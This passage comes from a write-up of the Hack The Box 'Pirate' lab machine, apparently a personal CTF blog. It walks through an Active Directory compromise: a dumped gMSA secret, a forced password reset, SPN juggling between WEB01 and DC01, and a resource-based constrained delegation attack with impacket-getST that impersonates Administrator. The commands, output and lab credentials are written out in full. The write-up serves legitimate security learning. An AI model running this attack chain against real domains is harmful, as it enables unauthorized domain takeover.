[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11 
 0000   01 00 00 00 22 01 00 00  10 00 00 00 12 01 1A 01   ...."...........
 0010   B6 C4 08 39 11 A2 83 50  B1 FD 69 48 80 36 50 E1   ...9...P..iH.6P.
 0020   B1 C5 74 1F 77 19 B1 F4  FF 92 62 03 DC DF 4E C9   ..t.w.....b...N.
 0030   C0 36 9B 7B 92 FE 10 A2  D7 FF 95 3B FA 40 6A 3B   .6.{.......;.@j;
 0040   67 86 52 3E D8 27 67 CC  8F E2 73 4A F8 92 E9 8E   g.R>.'g...sJ....
 0050   FB EF 2B 34 76 75 90 32  B4 EC DE F3 42 76 C3 63   ..+4vu.2....Bv.c
 0060   B8 A9 41 0B 63 D8 09 EA  6E F1 67 F5 B5 41 D7 3C   ..A.c...n.g..A.<
 0070   3A C4 21 4D A2 2A 14 D9  79 82 C9 28 D9 1B B9 71   :.!M.*..y..(...q
 0080   FE 99 D4 80 9C 1E BD EA  E8 E7 69 C6 B3 37 7E E1   ..........i..7~.
 0090   A4 78 DF FB B2 DD C1 33  18 BE 13 11 67 D1 A4 A0   .x.....3....g...
 00a0   18 33 A4 C2 7E 05 12 69  0D 73 DE 1E 59 A0 17 61   .3..~..i.s..Y..a
 00b0   EC 7D 40 FC 18 82 05 0C  BF 43 9D 9C BB 28 1A 06   .}@......C...(..
 00c0   D4 BF 8D 85 D1 FE B2 74  0E C3 99 EC A0 E4 6E 36   .......t......n6
 00d0   99 0B 72 B2 C4 A6 4A E0  09 BA FB 3D FD 26 4F F7   ..r...J....=.&O.
 00e0   34 B6 3F B9 22 60 9E 8C  30 58 83 A7 5D 9A EF 75   4.?."`..0X..]..u
 00f0   CE 37 BC A0 91 04 36 59  0D 93 12 FC A4 6A D8 9A   .7....6Y.....j..
 0100   61 A8 9B DD C8 73 19 7D  E4 8E AB 3D 69 B9 E4 98   a....s.}...=i...
 0110   00 00 19 41 B0 1B 73 17  00 00 19 E3 DF 68 72 17   ...A..s......hr.
 0120   00 00                                              ..
_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_a09ca32bc7cd2ce752ae0143bd203f0551564c04dd2846c4ed3e4e5a61cc9f11:01000000220100001000000012011a01b6c4083911a28350b1fd6948803650e1b1c5741f7719b1f4ff926203dcdf4ec9c0369b7b92fe10a2d7ff953bfa406a3b6786523ed82767cc8fe2734af892e98efbef2b3476759032b4ecdef34276c363b8a9410b63d809ea6ef167f5b541d73c3ac4214da22a14d97982c928d91bb971fe99d4809c1ebdeae8e769c6b3377ee1a478dffbb2ddc13318be131167d1a4a01833a4c27e0512690d73de1e59a01761ec7d40fc1882050cbf439d9cbb281a06d4bf8d85d1feb2740ec399eca0e46e36990b72b2c4a64ae009bafb3dfd264ff734b63fb922609e8c305883a75d9aef75ce37bca0910436590d9312fca46ad89a61a89bddc873197de48eab3d69b9e49800001941b01b7317000019e3df6872170000
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

```

Found clearText Password for a.white.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fgs4J4WrmmhoPu88NRx0c%2Fimage.png?alt=media&amp;token=96f36241-5d21-4611-a119-d60fbff084bd" alt=""><figcaption></figcaption></figure>

i can use the creds to force change password of A.WHITE\_ADM

But i am gonna get a shell access on WEB01 and see if there anything useful there.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FoLo3bEM9ul4tNQXIEkfM%2Fimage.png?alt=media&amp;token=15c93468-ec80-472d-92f9-55d29c6a732d" alt=""><figcaption></figcaption></figure>

```powershell
┌──(ajay㉿kali)-[~]
└─$ net rpc password a.white_adm 'H4cked123!' \
  -U 'pirate.htb/a.white%E2nvAOKSz5Xz2MJu' -S 10.129.244.95                                                               
```

Get a TGT for a.white\_adm

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FF8flPRElHV6niI2w5svE%2Fimage.png?alt=media&amp;token=1737afda-18cf-4777-aca4-b71f19c0e254" alt=""><figcaption></figcaption></figure>

```bash
──(ajay㉿kali)-[~]
└─$ bloodyAD --host DC01.pirate.htb --dc-ip 10.129.244.95 -d pirate.htb -k get writable

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=pirate,DC=htb
permission: WRITE

distinguishedName: CN=DC01,OU=Domain Controllers,DC=pirate,DC=htb
permission: WRITE

distinguishedName: CN=Angela W. ADM,CN=Users,DC=pirate,DC=htb
permission: WRITE

distinguishedName: CN=WEB01,CN=Computers,DC=pirate,DC=htb
permission: WRITE

distinguishedName: CN=MS01,CN=Computers,DC=pirate,DC=htb
permission: WRITE

distinguishedName: CN=EXCH01,CN=Computers,DC=pirate,DC=htb
permission: WRITE

distinguishedName: DC=pirate.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=pirate,DC=htb
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.pirate.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=pirate,DC=htb
permission: CREATE_CHILD
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvZemYRLUBgxTw0iZpLzu%2Fimage.png?alt=media&amp;token=36f1d78e-640f-4ddd-a45d-02182072e1c5" alt=""><figcaption></figcaption></figure>

a.white\_Adm has WriteSPN permissions on DC01.

That said a.white\_ADM has dlegation permissions to WEB01 and he also have writespn on web01.

so what i can do here is perform SPN juggling and move the spn of web01 to DC01 and and use the spn to perfom RBCD attack to reach admin.

### SPN Juggling

```powershell
┌──(ajay㉿kali)-[~]
└─$ bloodyAD -d pirate.htb -u 'a.white_adm' -p 'H4cked123!' --host 10.129.244.95 set object WEB01$ serviceprincipalname -v 'HOST/WEB01.pirate.htb'
[+] WEB01$'s servicePrincipalName has been updated
```

Now update the SPN For DC01$

```powershell
┌──(ajay㉿kali)-[~]
└─$ bloodyAD -d pirate.htb -u 'a.white_adm' -p 'H4cked123!' --host 10.129.244.95 set object DC01$ serviceprincipalname -v 'HTTP/WEB01.pirate.htb'
[+] DC01$'s servicePrincipalName has been updated
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FmfgV7X0XzJoPltdl0eQd%2Fimage.png?alt=media&amp;token=b9ab5e59-67a3-4798-97d4-28d40a23eaf1" alt=""><figcaption></figcaption></figure>

With the SPN now in DC01$, we use the delegation of a.white\_admto get a ticket as Administratorabout `HTTP/WEB01.pirate.htb`. With altserviceWe reinterpret it as `CIFS/DC01.pirate.htb:`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FipCVatxG3DeLQWifkPxZ%2Fimage.png?alt=media&amp;token=e0c4efce-ad23-40f8-8525-ef18b9a946ad" alt=""><figcaption></figcaption></figure>

```powershell
──(ajay㉿kali)-[~]
└─$ impacket-getST -spn 'HTTP/WEB01.pirate.htb' \
  -impersonate Administrator \
  -altservice 'CIFS/DC01.pirate.htb' \
  -k -no-pass pirate.htb/a.white_adm \
  -dc-ip  10.129.244.95
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from HTTP/WEB01.pirate.htb@PIRATE.HTB to CIFS/DC01.pirate.htb@PIRATE.HTB
[*] Saving ticket in Administrator@CIFS_DC01.pirate.htb@PIRATE.HTB.ccache
                                                                                                                                                                                                                                            
┌──(ajay㉿kali)-[~]
└─$ export KRB5CCNAME=/home/ajay/Administrator@CIFS_DC01.pirate.htb@PIRATE.HTB.ccache
```

## Shell as Administrator

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlJEgzbQ1nW8yajh3qGdp%2Fimage.png?alt=media&amp;token=96bce99e-286f-42cf-9f25-aa652dcf44c6" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-season-10/htb-pirate.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
